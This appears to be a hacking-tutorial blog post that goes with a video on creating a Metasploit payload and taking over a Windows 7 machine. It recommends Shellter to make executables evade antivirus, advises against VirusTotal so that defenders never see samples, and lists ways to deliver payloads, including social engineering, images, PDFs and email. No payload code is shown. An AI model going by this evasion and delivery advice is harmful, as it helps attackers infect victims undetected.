For this video - article, I set up Windows 7 (As an easy target). Create a payload with Metasploit MSFvenom and get full control over the target machine using Metasploit MSFConsole. And then we going to have some fun.
I like to mention, that these commands I use in this tutorial are the same and it does not matter wetter you use Kali Linux or Parrot Security OS. All commands are the same.
I am using Kali Linux. But once you have installed Metasploit on your computer, you can use these commands that I use, with any Operating System. So both with Kali Linux, Parrot Security OS, and a regular Ubuntu installation.
In the example I show in the video, I put the made payload with MSFVernom on the Kali Linux Apache server.
But there are more options for setting up a simple server.
You have to make sure that python3 is installed, then you can start the server with a very simple command:
python3 -m http.server
Obviously it is very cool if you can program yourself a bit so that you can make your own FUD (Fully Undetectable) script. But not everyone can do this and that is why you can use the scripty below for this.
To encode the executable, you can use Shellter. Shellter works by changing the executable’s signatures from the obviously malicious one to a completely new and unique one that can bypass detection.
For Debian-based link Kali Linux or Parrot Security
sudo apt install shellter
For Arch - based like BlackArch
sudo pacman -S shellter
Be aware Never - ever upload scripts, payloads, or whatever to VirusTotal or other online scanners! They hand everything over to antivirus companies. This has never been a secret.
This is a mistake I see many people make. If you are using someone else’s tool, you are making it less likely to work in the future. AV companies aren’t always detecting a payload. They’re often detecting the method used to hide it. So every time you upload a test payload, you’re helping them along.
Virustotal analyzes suspicious files and URLs to detect types of malware, automatically share them with the security community
Obviously, if you are a regular computer user, and not dealing with payloads and other scripts, and you think a “file” is malicious then I would say, of course, you have to find out if the file is doomed
A payload can be considered to be somewhat similar to a virus. A payload is a set of malicious codes that carry crucial information that can be used to hack any device beyond limits that you can’t imagine.
Like the Greek soldiers hiding inside the wooden horse in the tale of the Trojan Horse, a malicious payload can sit harmlessly for some time until triggered and can do the job.
That’s a question I could turn into a lot of articles.
In fact, once you’ve created a payload, you still have to get the payload to a victim, and that can sometimes be quite a challenge. Below I will mention some options.
- Social Engineering
- Process the payload in an image
- Process the payload in a PDF file
- Put the payload on a server
- Put the payload on a website
- Process the payload in an email
- And so on
- This article was written for educational purposes and pentest only.
- The author can not be held responsible for damages caused by the use of these resources.
- You will not misuse the information to gain unauthorized access.
- The information shall only be used to expand knowledge and not for causing malicious or damaging attacks.
- Just remember, Performing any hacks without written permission is illegal …!
My goal is to educate people and increase awareness by exposing methods used by real black-hat hackers and show how to secure systems from these hackers.
(writer: bulls eye)